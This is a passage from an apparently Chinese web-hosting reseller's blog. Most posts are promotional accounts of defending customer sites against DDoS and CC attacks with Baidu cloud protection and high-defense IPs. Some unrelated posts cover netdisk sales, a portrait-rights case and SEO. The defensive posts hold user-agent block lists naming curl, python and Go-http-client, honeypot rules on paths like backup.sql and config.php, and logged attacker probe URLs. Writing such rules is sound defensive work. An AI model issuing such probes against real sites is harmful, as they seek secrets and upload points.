80.163.188.255180.163.189.1-180.163.189.255101.227.206.1-101.227.206.255101.227.207.1-101.227.207.255180.163.113.1-180.163.113.255180.163.154.1-180.163.154.255180.163.153.1-180.163.153.255103.21.244.1-103.21.247.255103.22.200.1-103.22.203.255然后进入宝塔防火墙开启屏蔽海外访问即可。 #### 利用百度云加速专业版成功帮客户抵御6亿次CC攻击记录 昨天接到一位客户,网站被DDOS攻击了,服务器IP被机房封了,然后联系上主机吧购买了百度云加速专业版。 一开始的时候客户抱着侥幸心理,并没有给服务器换个没有暴露的IP,而是直接购买后就用旧的服务器。 结果没几个小时,IP又被封了。后来,在这边的建议下,客户换了个新服务器,并在百度云加速里直接更改了服务器指向,就正常了。 直至今日,百度云加速稳稳的防了下,这次防御攻击最高CC峰值达5.8亿次,可以说是非常高的。 这里提醒要防御的同学,一定要把被攻击过的IP更换掉,然后再用百度云加速隐藏起来,因为一般DDOS攻击都是针对IP的,一但暴露IP,就相当于网站有了后门,对方可以直接绕过百度云加速进行攻击,这样防御就没效果了。   #### 利用百度云加速企业版为客户防护100G DDoS攻击案例 今天收到一位客户给主机吧介绍一位客户,说是被DDOS攻击的,峰值高达100多G。(说明主机吧在老客户心里还是很靠谱的) 咨询主机吧有什么靠谱的防御吗?考虑到客户的经济实力,主机吧推荐用户使用百度云加速企业版,季付只需要4450元,防御100多G峰值是没问题的。 一番考虑后,客户果断购买了企业版,主机吧让客户更换服务器IP后,添加解析百度云加速记录后,30分钟后就立马可以访问了。 期间那黑客给客户发来了勒索信息: 上了百度云加速后,客户服务器就没有在再黑洞过,所以就没有再理他了,目前网站正稳定运行中,我们将在这几天对客户网站进行一个跟踪,一般黑客试几次攻击后,见没有效果都是会放弃的。   #### 利用百度云加速企业版防御住峰值400G DDoS攻击的经历 前天遇到一位客户,说是网站被攻击了,流量高达424G峰值,想问主机吧用什么防御好? 在了解客户情况后,我们建议客户使用百度云加速企业版进行防御,因为百度云加速节点多,有1TB的防御压制力,提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 然后我们让客户先把服务器IP换个新的,再接入百度云加速隐藏起来,经过一番折腾后,第二天果然防住了。 服务器也没有任何问题,从这里我们可以看出,百度云加速还是相当牛逼的,价格便宜,而且防御比一些高防服务器好,这位客户本身使用的就是高防服务器,但是都经不住攻击,而百度云加速稳稳的抗下来了!   #### 利用百度云加速商务版URL黑名单防CC攻击技巧 今天遇到一位客户反馈网站被大量CC攻击,开启强力防护模式依然没效果,主机吧进入报表看了下,攻击量很高,CC攻击峰值高达1亿次 这就导致百度云加速自动调起超级清洗进行防御了,开启超给清洗后,防CC效果是没有普通节点的强力防护模式效果好的。这也导致了服务器的CPU居高不下。 解决这个问题需要利用商务版以上专有的功能:URL黑名单 首先我们进入宝塔(客户使用的是宝塔面板)查看对方大量请求哪个URL地址,查看网站响应日志: 发现CC大量请求URL/public/index.php/api/order/getOrderInfo、/index.php/api/kdata/getfutures 那么我们进入百度云加速安全功能,ADS,找到 URL黑名单 功能,输入域名地址即可如下图: 添加验证URL后,我们访问这个地址就会出现2秒的安全检查,如下图: 黑客的CC攻击自然就无法穿过拦截了,此方法主机吧测试非常有效,防御CC非常好,目前已经为客户拦截了3亿次CC攻击。 #### 利用百度云加速成功给客户网站防护流量攻击 前几天接手一客户网站,反馈网站这几天出现打开进去要好十几秒才进得去,卡得很,不过服务器内存CPU都正常。 经主机吧检查发现客户网站入网宽带相当高,达到每秒7MB左右,那也就是说客户服务器起码得50M宽带才能带得动现在的带宽。 而我们咨询过客户,客户网站流量并不高,也没有什么视频类的占用宽带的资源,那么我们可以确定这是一起针对宽带资源的流量攻击。 解决办法很简单,直接给客户接入百度云加速专业版CDN进行流量分发就可以解决了。 接入成功后网站已经恢复正常访问了,速度也得到不错的提升级。通过百度云加速CDN报表我们可以看到上7点左右流量达到一天的高峰值达到每秒1.64G,做过网站的都知道每天7点以下的时间几乎是每天流量最低的时候,而报表显示确是最高流量,说明这是有人对网站进行了流量攻击。在经过百度云加速的防御后,网站安稳运行中,后期我们再继续观察。   #### 利用百度云加速边缘计算自定义防盗链 设置添加以下函数即可: addEventListener('fetch', event => { event.respondWith(handleRequest(event.request)) }) /** * Fetch and log a request * @param {Request} request */ const ErrorPageHotLink = ` <!DOCTYPE html> <html> <body> <h1>Error Page</h1> <p>此网站的管理员禁止盗链此资源</p> </body> </html> `; // 防盗链错误页面 async function rawHtmlResponse(html) { const init = { status: 403, headers: { 'content-type': 'text/html;charset=UTF-8', }, }; return new Response(html, init); } async function handleRequest(request) { const refer = request.headers.get('referer') // 自定义判断refer来进行错误页面返回 if (refer === null || refer === '') { return rawHtmlResponse(ErrorPageHotLink); } const response = await fetch(request); return response; } 演示地址 #### 利用百度云加速边缘计算配置函数:自义错误页设置方法 百度云加速的边缘计算功能开放已经有一段时间了,不过这功能要求有开发能力或有代码维护能力的客户才可以玩得转,很遗憾主机吧完全没有。 据说如果会玩这功能的,可以有效的给自己服务器减压,使访问流量大部分都走边缘节点,提高访问速度,对应对流量攻击也非常好。 虽然高端的我们不会玩,普通的我们还是可以的,比如自义错误页,很多站长之前就抱怨使用云加速后,错误页都显示百度云加速默认的错误页了。今天我们来教大家如何使用边缘计算功能来达到自义错误页的目的。 首先我们进入控制台,我的函数,添加,函数名字随便写,比如这边就写cuowuye 确定后点编辑 进入函数编辑,输入以下代码,并保存。 /** * 该示例展示了如果针对不同的 HTTP CODE 返回不同的页面。 * */ // 在workers代码里固化的错误页面 const ErrorPageLocal500 = ` <!DOCTYPE html> <html> <body> <h1>Error Page</h1> <p>这是错误页,请重新访问……</p> </body> </html> ` // 指定的错误页面 const ErrorPageURL400 = 'http://errorpage.example.com' async function rawHtmlResponse(html) { const init = { headers: { 'content-type': 'text/html;charset=UTF-8', }, } return new Response(html, init) } async function handleRequest(request) { const response = await fetch(request) // 如果请求成功,则返回请求结果 if (response.status == 200) return response // 如果请求返回的状态码是400,返回400对应的错误页面 else if (response.status == 400) return await fetch(ErrorPageURL400) // 如果请求返回的状态码是500,返回500对应的错误页面 else return rawHtmlResponse(ErrorPageLocal500) } addEventListener('fetch', event => { event.respondWith(handleRequest(event.request)) })   如下图: 完成后,我们返回,然后点击域名,进入域名管理, 边缘计算,添加触发规则 匹配内容:写你的域名并加上通配符,比如我们测试域名www.sudujun.com/* 执行函数:点下拉找到刚才添加的错误页函数 完成保存,我们再测试下, 比如我们随便输入地址www.sudujun.com/hgdhghdkgh ,这是一个明显的错误页,因为这个页面根本不存在的,我们再看效果。   #### 利用百度云防护企业版拦截CC攻击、恶意爬虫、采集操作方法 今天接入到一位深受黑客攻击影响的客户求助,网站经常被CC攻击,还有大量爬虫,还有采集等情况,服务器CPU、带宽总是不够用,想要找解决办法。 在了解情况后,我们推荐客户使用百度云防护企业版: 企业版 DDOS防护:支持 CC攻击防护:支持 WEB应用防火墙:支持 WAF自定义规则:20条 Bot防护:支持(爬虫防护) 威胁情报: 支持设备情报+IP情报 API安全:支持 动静态智能加速:支持 自定义缓存策略:支持 HTTPS:支持 IPV6:支持 防护域名额度:1个(10个子域名) 泛域名解析:支持 套餐每月流量:30TB 2999元/月 29990元/年 这个套餐拥有一个非常强大的功能bot防护功能,对付CC攻击、网站采集、恶意爬虫效果非常好。 现在我们来看实际操作: 成功接入并解析百度云防护哦,我们先做静态文件缓存。 开启缓存,缓存文件: bmp,ejs,jpeg,pdf,ps,ttf,class,eot,jpg,pict,svg,webp,css,eps,js,pls,svgz,woff,csv,gif,mid,png,swf,woff2,doc,ico,midi,ppt,tif,xls,docx,jar,otf,pptx,tiff,xlsx 这样做是可以尽量减少图片等静态文件回源影响服务器带宽。 创建web防护规则,自定义访问策略,把已知的恶爬虫UA封禁,主机帮主要设置封禁: gptbot、amazonbot、PanguBot、BLEXBot、DataForSeoBot、SemrushBot、curl、python、MJ12bot、Bullet、Go-http-client、Java、Scrapy 如下图: 虽然一般情况下百度云防护并不会误杀搜索引擎蜘蛛的请求,不过以防万一我们还是针对蜘蛛设置了白名单 然后进入关键功能-bot规则,对应域名开启防护 具体操作如下 : 生效路径:/* Web SDK集成:手动集成BOT行为识别: AI智能防护-拦截 自定义策略: 名称:gaowei 条件:IP动态情报-属于-高危IP 黑 名称:pacong 条件:IP动态情报-属于-搜过引擎 黑 名称:IDC 条件:地域情报-属于-IDC IP 黑 处置动作:拦截 Bot 特征识别 勾选 简单脚本过滤(Javascript挑战)确定。 再复制创建一条规则 生效路径:/*.html (客户网页是纯静态页或者伪静态页)修改bot特征:开启高级bot防御 如下图: 确后点确认,我们再把验证JS代码加入到网页</head>前面 <script src="https://sec-captcha-waf-test.bj.bcebos.com/static/wb/1.0/nox_20241203.js"></script> <script>window.__toxCfg = {ht: 1, hc: 1};</script> <script src="https://sec-captcha-waf-test.bj.bcebos.com/static/wb/1.0/tox_20241203.js"></script> 这样每次请求都需要签名验证,如果没验证对的,就会拦截。 完成设置,等待查看效果。 BOT防护成功拦截 #### 利用百度云防护做一个蜜罐引诱黑客拦截 网站运营久了后,会经常遇到黑客的扫描工具,这些工具会大量扫描网站的私密链接,从而进行破解。 今天我们利用百度云防护做一个蜜罐链接,当黑客扫描这个链接后,我们就进行拦截,使其无法再继续扫描别的链接。 操作方法很简单: 1.进入web防护-自定义规则 2.添加规则 规则名称:蜜罐 匹配条件:URI 包含多值之一 添加admin.php /backup/ backup.sql config.php (这些是黑客工具常访问的文件路径,如果你有别的也可以增加) 处置动作:拦截并追加封禁 封禁时长:1440 3.保存确认后我们再来测试拦截效果 访问https://www.zhujib.com/admin.php 显示拦截 后续访问都会被拦截。 通过拦截记录我们不仅可以知道黑客的IP,还可以知道对方使用的UA等信息,可以针对性封禁。 #### 利用百度云防护区域黑名单设置保护网站只限某一省份访问 一些用户的网站或者子域名网站可能需要内部访问,不希望别人访问这个域名,而百度云防护的区域黑名单设置可能有效拦截除指定省份外的访问请求。 具体操作如下,创建Web防护规则,找到区域黑名单开启,并点设置 比方说我只给广西访问,其它地区选中,拉黑即可 然后,其它地区访问会显示被拦截。 #### 利用百度云防护拦截Go-http-client/1.1爬虫请求 今天,发现查看网站日志发现有一堆UA为“Go-http-client/1.1”的请求记录,访问的都是一些乱七八糟的地址,如下图: 然后,主机吧通过截图给AI咨询,得到的答案如下: 这些请求可能是一些自动化工具在测试网站漏洞,因此,非常有必要对此进行拦截。 主机帮通过百度云防护web规则,创建UA含Go-http-client/1.1的拦截规则。 然后我们再来看效果: 成功拦截,查看网站请求日志,已被拦截,服务器已经查不到相关记录。 通过百度云防护拦截,不仅安全,还可以减少恶意请求带来的服务器压力,相比直接部署在本地服务器上的防火墙好得多,有需要百度云防护的同学,可以联系主机帮购买。 #### 利用百度云防护拦截gptbot amazonbot PanguBot BLEXBot DataForSeoBot SemrushBot等爬虫 最近,一位做文库的站长反馈,网站服务器经常无缘无故的宕机,CPU被占满。 主机邦查询后发现客户网站出现大量爬虫访问,最多的是gptbot、amazonbot、PanguBot、BLEXBot、DataForSeoBot、SemrushBot这几个访问最多,一天能请求进来几十万次,简直疯狂。 这些爬虫大多是一些AI爬虫或者数据分析网站的爬虫,对网站没有任何用处,因此,可以利用百度云防护进行拦截。 操作方法如下: 1.登陆Web防护规则-创建Web防护规则 2.开启自定义防护策略,并添加策略 3.策略如 User-Agent 包含 gptbot 拦截并追加封禁 1440分钟 把上面的爬虫名字全添加上去 然后保存,并关联相关域名。 我们再来看效果: 成功拦截,客户服务器恢复稳定! #### 利用百度云防护拦截恶意爬虫请求网站 最近一段时间,总有站长反馈,服务器无缘无故状态满了,但安全CDN又识别不出来。 为此,主机帮还特地查询了下客户网站发生CPU爆满时的请求日志,发现 在同一时间网站出现小规模的请求,而且请求的链接都不是固定的,连UA都是不一样的,而且请求量很小,根本达到不到百度云防护CC攻击拦截的阀值。 通过采用了百度云防护企业版的bot防护功能,该功能不仅能对已知恶意爬虫进行拦截,还可以自动识别新的爬虫IP,还支持自定义规则,比如拦截IDC 数据中心的IP、基站的IP、NAT IP、爬虫 IP 、高危IP,同时还支持拦截1小时以内的新设备、1天以内的旧设备、7天以上的旧设备。 功能强大,可有效应对各类爬虫机器人。 #### 利用百度云防护拦截黑客对网站的敏感信息探测 有做网站运维的同学,查看网站日志的时候一定见过访问以下链接的: www.xxx.com/backup.sql www.XXX.com/www.zhujib.com/..sql www.xxx.com/WWxxW.sql www.xxx.com/index.php?s=captcha xxx.com/includes/fckeditor/editor/filemanager/browser/default/images/icons/js.gif/1.php www.xxx.com/users/eACBposnq/collections/\"https:\/\/www.xxx.com\/gold\/\"https:\/\/www.zhujib.com\/\"https:\/\/www.xxx.com\/gold\/\"https:\/\/www.xxx.com\/\"javascript:void(0)\" 这些乱七八糟的访问,其实都是黑客针对网站的敏感信息探测,通过这类查询可访问网站的敏感信息,从而入侵网站。 解决这类访问最好的办法是部署百度云防护 web 应用防火墙,百度云防护可有效拦截这类有害扫描。 以主机帮为例,部署百度云防护后,每天拦截大量的敏感信息扫描。 这类扫描不仅影响网站安全,同时也影响服务器稳定,他们的爬虫对网站服务器资源造成非常大的影响,每次抓取都会造成服务器CPU跳高,如果服务器配置低的,很容易因为这些爬虫探测造成服务器CPU100%的情况,这是非常常见的,很多网站服务器运行了一两年后,发现服务器配置不够用了,CPU经常100%,这就是由于网站上爬满了网络爬虫,他们无时无刻都在爬你的服务器。 所以网站部署web应用防火墙是非常有必要的,我们推荐百度云防护。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### 利用百度云防护防御CC攻击实战 今天,一位客户找上我们,反馈网站被CC攻击,咨询使用哪些产品比较好。 主机吧在了解下详细情况后,推荐使用百度云防护这款产品,原因是百度云防护不仅价格便宜,而且在防御CC攻击这块有很高的自定义,不仅可以有被动CC攻击防御策略,还有主动自定义访问功能有,访问频率限制等。 今天我们实战下如何防御CC攻击: 成功接入百度云防护,进入配置中心-防护模板,创建防护模板 开启CC防护,如正遭遇CC攻击开启超级严格 如果知道攻击IP或者固定UA的可以通过自定义访问策略拦截, 这里我们先不要开。 访问频率限制这个可针对API请求的CC攻击检测拦截,如果没有,建议先不开 开启区域黑名单设置,选封禁海外区域,如果网站不需要海外访问的,建议开启,因为CC攻击80%的IP基本都是来自海外的。 然后点保存模板。 再进入接入配置 找到被攻击的子域名,开启自定义防护,选之前创建的模板,保存。 这样,我们就完成了百度云防护的CC攻击开启配置了。 然后我们5分钟后查看攻击日志,显示攻击拦截成功。 客户网站已正常打开,此次实战CC攻击防御成功。 #### 利用百度网盘商城“度小麦”借助特长和卖资料赚钱 空有一身本事,没地方施展? 空有一身技能,却赚不到钱? 现在,机会来了! 本文1500字,阅读需要5分钟时间,为了方便大家阅读,全文目录如下: 【一】百度亿级流量扶持,度小麦仅需3步,即可实现盈利创收! 【二】项目前期筹备工作 【三】如何开设店铺,上传资料售卖 【四】3步快速创造属于自己的内容 【五】全网渠道引流推广 【六】多种变现方式 【一】百度亿级流量扶持,度小麦仅需3步,即可实现盈利创收! 百度网盘开通了旗下商城平台——度小麦平台,是百度网盘推出的面向全体网民开放的、数字资产发布平台。拥有一个实名的百度账号,登录度小麦开放平台,发布个人资产,仅需三个步骤便可通过数据资产赚到钱。 任何一位网民均可将自己创造生产的图片、音频、视频及文档等数字产品发布到百度网盘内容商城、微信等渠道进行传播和售卖,通过数字产品资产盈利。 百度全系千亿级流量支持,新的流量口子。我们可以发挥自己一技之长创作数字产品发布到内容商城中,获得百度网盘亿级流量扶持,利用业余时间,通过自己实打实的技能分享资料赚钱。 用户购买产品之后获得交易金,累积大于10元就可提现,每天可以提现10次,每次最多提现5000元,付款周期为T+7天。通过微信提现,提现须提前绑定实名认证的微信号。 【二】项目前期筹备工作 1百度网盘实名账号1个:用来开设账户 2电脑1台:用来上传资料,以及引流推广 3手机1个,实名微信1个:方便收款和打造个人ip 4录音麦克风、录屏软件:用来录制自己的资料。 【三】如何开设店铺,上传资料售卖 1登录实名网盘账户,点击“找资源”。 2点击右上角“卖资源” 3我们可以来到到度小麦的主页,点击“立即创建” 4度小麦的后台,分别有创建商品、支持音频、视频、文档、图档等内容商品 5快速创建自己的内容商品,支持从网盘投入、本地上传。 6上传完毕后,完善商品信息,设定好售卖的价格。如果你的课程资料已经完结,选择完结。然后点“立即上架” 7设置自己的内容商品是否支持试看或者试听 8点击“去认证”,晚上自己商品内容的版权认证 9上架完成后,系统会生成你店铺的地址链接,同时还有一个二维码,方便推广,微信扫码即可以实现购买。 10最后流量导入,盈利传授之后,别忘记及时提现 【四】3步快速创造属于自己的内容 赚钱不是一天养成的,我们可以通过策略打造出属于自己的内容商品 你若有特长,例如擅长编程,擅长插花,擅长手工,擅长糕点烹饪…… 把你在这个领域内的知识整理成体系,加上自己过往的作品和案例,制定出详细的课程目录。 根据目录,通过音频/视频/文档的形式输出自己的内容,优选自己擅长的形式,事半功倍。 内容输出后整理成专辑,上传度小麦上架售卖即可。 你若没特长!人总得有点爱好吧!你总有点喜欢或者想学的东西吧?!通过淘宝、知识付费平台等地方搜罗一些自己喜欢的领域的课程,大量吸收,消化后自己学习到自己喜欢的知识了,同时可以把自己学习到的东西整理成一套成体系,再通过音频/视频/文档的形式,重新输出。 这是一个奶牛吃草到产奶的过程。谁嫌弃草难吃,就产不出奶。 【五】全网渠道引流推广 流量讲千万遍,不如自己操作一遍 渠道有千万个,不如深耕细作一个 流量有千万法门,看图,选你喜欢的,专注玩上3个月,流量自动化了。玩不上3个月,不要说自己会做流量。 【六】多种变现方式 销售课程收益:你输出的内容商品,一本万利,不需要重复的成本,卖多少你就赚多少。还有百度流量扶持,如果你的作品足够优秀,被推荐上首页,简直就是躺赚。 社群变现:打造你的领域专属IP,将你的客户沉淀到微信,通过社群继续为他们输出价值,保持创收。 项目风险评估:项目风险很低,基本0成本,并且度小麦平台刚出来不久,坚持操作很容易赚到钱。 作者:毛小白日记 公众号:毛小白奋斗在深圳 #### 利用高防IP可无视中断连接CC攻击 昨晚主机吧的一个客户反馈网站被CC攻击了,导致网站崩溃无法访问。 通过我们访问日志后发现,这次攻击采用的了中断连接攻击,简单理解就是连接后立即中断连接,导致服务器CPU飙升。 为此我们专门利用高防IP的精准访问控制的策略,进行控制拦截,后续这类攻击就可以无视了。 有需要高防IP的同学可以联系主机吧,也可以直接进入网址https://www.suduwangluo.com/ip购买,价格优惠。 #### 利用高防IP拦截针对网站的CC攻击实战 今天,主机吧的一位客户联系上主机吧购买高防IP,进行拦截CC攻击。 下面我们来说下拦截经历: 1.登陆https://www.suduwangluo.com/ip/custom-purchase.html 选购高防IP 我们今天选的是最便宜的一款,华东二区高防IP,防御CC攻击不需要多大防御。 2.购买后,登陆高防IP管理,添加域名配置,如使用国内高防IP,记得先加白名单:https://console.suduwangluo.com/white/list,如服务器装有防火墙也要把高防IP的 IP段加白。 3.进入域名DNS解析高防IP,同时配置拦截规则 进入网站设置,开启人机识别 4.查看请求日志,针对性进行拦截。 发现CC攻击大量请求/search/ uri路径 进入网站设置,开启频率控制,紧急攻击,自定义规则 对该URI路径进行请求频率封禁 5.查看日志请求成功拦截,网站恢复正常。 #### 利用高防IP给客户游戏APP防御DDOS案例 最近有位客户联系上主机吧,反馈自家服务器经常被攻击,导致服务器被阿里黑洞了,请问主机吧要怎么防? 主机吧在咨询后知道客户的业务是游戏APP,不需要自义端口的,使用高防CDN不适合,所以主机吧推荐使用高防服务器或者高防IP进行防御。 但客户不想更换服务器怎么办?那么只能用高防IP了,通过https://www.suduwangluo.com/ip,购买适当配置的高防IP(不懂的可以咨询主机吧)。 进入控制台-高防IP-非网站防护 添加需要转发端口、源站端口、源站IP。 通过上述操作即可对源服务器的IP进行转发防御,并且隐藏源服务器IP,然后我们把APP转发的IP更换成购买的高防IP即可。 连接正常,目前除了有小规模的TCP攻击外,没有别的DOOS攻击。 有需要防御的同学欢迎联系,主机吧这边有高防IP、高防服务器、高防CDN,总有一款适合你。 #### 利用高防IP解决网站被攻击敲诈勒索事件 网络敲诈是经常有的事情,很多黑客利用对网站DDoS/CC攻击对网站经营者进行敲诈,敲诈金额往往都是几百几千不等。如果不给钱他就会一直攻击你的网站,让你的服务器受不了,打开慢,甚至打不开,而如果购买网站防御其实价格也是挺贵的,很多网站主为了省事也就交了“保护费”,然而你以为交了保护费他以后就不攻击你了吗?实事上却不是这么回事。 比如主机吧这位客户,去年8月份被攻击交了一次“保护费”就一段时间就没攻击了,但到了快春节的时候,却又遭到了攻击,还是那个人,攻击理由是“春节到了,给点红包花花",对于这种行为客户很生气,意识到这种流氓给一次钱是无法满足对方欲望的,想要解决只能报案或者购买防御,前者很难有效果,即使有效果估计也要很久,那时候网站估计损失更多,所以最终选择了进行网站防御。 一开始选择客户想选阿里云的DDOS防御,毕竟大品牌,结果一看吓一跳,最低的10G防御套餐一个月就6000+,实在受不住,然后经朋友介绍联系上了主机吧进行解决。 主机吧从客户那了解到情况后,推荐客户使用了最低的配的高防IP, 防御 400G 带宽50M,价格1200一个月,价格非常便宜,而且我们保证如果防御不住是可以退款的,客户很快就接受了。 经过客户域名配置解析至我们高防IP,网站很快正常运营了,然后我们迎来了黑客的第一次攻击,攻击时间在第二天的1点半左右,那时高防IP并没有开启CC防火墙,所以客户服务器CPU满了,服务器资源使用率达100%,客户反馈给主机吧,主机吧马上联系了技术进行检测,经检测黑客使用的是特殊CC攻击,在技术的调整策略下,服务器CPU很快就降下来,网站也正常了,整个过程在15分钟内,客户表示很满意! 第二天凌晨的时候那黑客联系上客户,表示会继续攻击,然而直到现在也没有再接到攻击的情况,主机吧估计黑客已经放弃了,当然我们不能因为黑客不攻击了而放弃防御,凡事以预防为主,等到被攻击了再进行防御,那时候已经晚了,同时有被攻击的客户可以联系主机吧,主机吧专业为您提供高防IP、高防CDN、高防服务器服务,价格优惠,质量保证! #### 利用高防IP防御427G DDOS攻击的实战经验 前段时间主机帮的这位客户刚被DDOS攻击超过300G,今天攻击更是超过了400G,直接导致了两个高防IP出现短暂的封禁状态。 好在我们利用DNS自动监控切换功能,及时对DNS进行了调整,自动切换可用的高防IP,我们知道如果利用单个高防IP来硬抗DDOS攻击的话,损失会非常大,原因是超过300G的 DDOS防御价格相当昂贵的。 我们利用两个300G的高防IP,进行了轮流切换,最后用腾讯云安全CDN来做保底,当一个高防IP被攻击封后,自动切换到另一个高防IP,当两个高防IP都封了后,我们再切换腾讯云的安全CDN上,这样最大限度减少了DDOS攻击造成的影响。 利用这个方法,我们本次成功防御住了黑客高达400G以上的DDOS攻击,而黑客也察觉到DDOS攻击成效低,于是换成了CC攻击,为此我们技术通过研究策略成功拦截住了CC攻击。 目前黑客应该是黔驴技穷了。 #### 利用高防IP防御一大波CC攻击 前几天有介绍过一位客户因为被CC攻击的问题,当时我们针对客户的攻击做了无视CC攻击防御规则,今天看到效果啦,那黑客今天又攻击了波,而且还很大,结果稳稳的防御住了。 每秒攻击35000左右,这水平属于中大型CC攻击水平了。 入网带宽峰值高达120Mbps左右。 高防IP后台精准的记录了攻击的时候。 客户反馈正常 高防IP后台监控 我们的高防IP提供完善的监控报表,可以让你很轻松的查看到自己高防IP的攻击大小,攻击时间等,真实防御,不存在虚报攻击大小,可以安全放心。 有需要高防IP的同学可以联系主机吧购买,在线购买地址:https://www.suduwangluo.com/ip #### 利用高防IP防御软件应用DDoS、CC攻击的案例 最近,主机吧接了一位要防护的客户,要求防御ddos、CC攻击。 咨询了解后,该客户的业务既有网站业务,也有软件应用业务。 那么显然使用高防CDN不大适合,高防CDN只适合网站业务,所以我们推荐使用我们的高防IP。 高防IP是针对互联网服务器在遭受大流量的DDoS攻击后导致服务不可用的情况下,推出的付费增值服务。 适用场景 金融、游戏、媒资、政府等网络安全攻击防护 实时对战游戏、在线金融、电商等业务对用户体验实时性要求较高的场景 业务中存在大量端口、域名、IP的DDoS攻击防护场景 我们高防IP功能: DDoS防御 基于先进特征识别算法进行精确清洗,实现最高TGbps级别防御,帮助您抵御 Syn Flood、ICMP Flood等各种DDoS大流量攻击。支持TCP/UDP/HTTP/HTTPS CC防护 通过防护模式识别、身份识别等多种手段,精确识别恶意访问者,采用重认证、验证码、访问控制等手段精准打击,帮助您抵御http get等各类攻击。可自行调节系统策略的严格程度 源站隐藏 使用我们高防IP后,您可以将域名解析到我们高防IP后,由我们高防IP转发您的真实IP地址,这样就达到隐藏真实IP目标,使用源站隐藏功能后,攻击者将无法直接攻击您的网站服务器 全量攻击日志 无需付费,即可查询TG级的全量请求日志数据。分别从地区,URI,访问次数,HTTP协议要素汇总和分析所有请求。让恶意攻击更易被发现和处理,全量日志中包含智能防护策略功能 实时攻击警报 支持DDoS攻击流量警报,SSL证书到期警报,CC攻击警报,QPS激增警报,高防IP封禁警报。上述警报默认通过短信,允许用户自己设置发送频率 自动防御模式 如需根据高防IP的大数据攻击分析结果自动使用防护工具和策略,可以联系售后人员开放 防端口扫描 对于TCP/UDP协议,会经常遭到恶意端口扫描,一旦分析到在用的端口和服务,更容易遭受针对性的渗透和暴力破解。高防IP可对此种恶意扫描进行封禁 在主机吧的指导下成功接入高防IP,目前防御成功,成功非法请求,同时成功拦截DDOS攻击,目前应用程序稳定运行,有需要的同学可以联系主机吧购买,或者直接登陆网址:https://www.suduwangluo.com/ip注册帐号购买。 #### 别乱用明星照片,公众号未授权用其照片做插图被郭富城告判赔100万 12月29日 消息:12月26日,广东省高级人民法院公布了第五批粤港澳大湾区跨境纠纷典型案件,其中一例是“香港居民郭富城诉广州合美公司肖像权纠纷案”。 案中,被告未经郭富城的许可,利用他的肖像进行网络及线下的广告推广,法院查明此为对郭富城肖像权的侵害,判定被告赔偿经济损失100万元,并公开赔礼道歉。 据了解,自2019年起,广州合美公司便擅自在多个微信公众号上发布含有郭富城照片的文章,且将郭富城暗含为其品牌产品的代言人。 该公司发表的文章,标题为《合美电动车门头以及其他画面下载连接》、《年终大会战,共赢2020,合美电动车深圳、东莞招商峰会》,其中都特别强调“天王郭富城助阵”、“天王助力合美”、“签约天王巨星郭富城”等字眼,容易让公众误以为郭富城与被告有品牌代言关系,增加郭富城可能受到的商业宣传风险及社会道德责任,损害他的信誉和信用。 因此,郭富城向广东自由贸易区南沙片区人民法院提起诉讼,要求被告赔偿经济损失500万元,精神损害抚慰金10万元,并在报纸和微信公众号发布致歉声明。 #### 别研究百度搜索了 研究谷歌搜索吧 这几年,百度对流量控制越发严格,很多网站根本从百度得不到流量。 不过,不用担心,百度没流量,谷歌还是有流量的,主机帮博客这 几个月来自谷歌的流量暴涨! 有一次还因为一篇文章排名好,一天来了390的流量。 所以,站长们可以考虑研究下谷歌,毕竟谷歌还是很公平的,内容质量只要好的话,基本都是能上排名。 做谷歌的方法网上有很多,主机帮这里根据自己的经验给大家说下: 1.接入谷歌站长平台(search.google.com) 网址一定要接入站长平台,只有接入谷歌站长平台,谷歌才更容易发现你。 2.提交网址地图 3.API自动提交 有条件的同学,可以弄个谷歌API自动提交,当发布文章时,自动提交谷歌索引,这个很有用,主机帮用的wordpress程序就有相关的插件,所以很简单。 4.适当在海外发布下外链 记得不要太多,主要是为了引谷歌蜘蛛,虽然谷歌说外链影响效果有限,但是主机帮认为还是有些用的。 5.做符合谷歌网页核心指标的网站 在站长平台可以看到这个功能,只有这个体验好了,谷歌才会给你更好的展示,主要影响因素是网页响应速度,所以好的程序优化很重要。 好了,以上就是针对谷歌的一些方法,希望可以帮到大家获取更多流量。 #### 制裁百度还得靠工信部!工信部出手了:禁止强制导流APP 前两天主机吧就有反馈过百度搜索开始强推百度APP一事,后面主机吧还到工信部的微信公众号投诉了一波,没想到今天工信部居然出手了: 3 月 3 日消息,工信微报,近日,有网友和媒体反映部分网站在用户浏览页面信息时,强制要求下载 App 问题。工业和信息化部信息通信管理局对此高度重视,立即组织核查,并于日前召开行政指导会,督促相关互联网企业进行整改。 会议指出,随着移动互联网的快速发展,各类 App 蓬勃兴起,给用户提供了丰富的应用服务。但部分信息资讯、网络社区等网站在用户浏览网页时,频繁弹窗推荐 App,要求下载 App 才能查看全文、不用 App 不能看评论等,妨碍用户使用网页浏览信息,侵害用户合法权益,群众反映强烈。 会议要求,相关互联网企业要坚持以人民为中心的发展思想,严格遵守相关法律法规要求,时刻把维护用户权益和改善服务体验作为赢得用户的根本,自查自纠、立行立改,坚决纠正存在的问题。 在用户浏览页面内容时,一是未经用户同意或主动选择,不得自动或强制下载 App;推荐下载 App 时,应同步提供明显的“取消”选项,切实保障用户的知情权、选择权。二是无合理正当理由,不得要求用户不下载 App 就不给看,或者不让看全文。三是不得以折叠显示、主动弹窗、频繁提示、降低体验等方式强迫、误导用户下载、打开 App,或跳转至应用商店,影响用户正常浏览信息。 相关互联网企业表示,将认真落实有关要求,全面自查整改,依法合规经营,改进服务,提升用户体验,共同营造让群众放心满意的移动互联网应用环境。 主机吧对此特地去测试了下百度搜索的网页版,果然下拉的强制下载APP没有了! 不过,还是新浪微博还是有的强推APP的情况,估计还没来及改。 这件事对于中小站长来说,是一个非常有利的事情,大厂强推APP是会把互联网流量会使流量越来越集中,而这些集中的流量其它中小公司是分不到的,比如百度APP,一但大家搜索都用百度APP了,那么搜索结果将全部是百度系的产品,想想都非常可怕。 #### 刷百度权重的那些事 揭秘假百度权重操作 新手站长必看 导语:刚刚接触网站的新手,都会关注百度权重。虽然百度官方没有承认百度权重的存在,但是随着谷歌退出中国,越来越多的站长开始关注百度权重。有人关注就会有市场,因此市面上就出现了很多刷百度权重的情况,然后把高权重网站卖给一些网站新手。 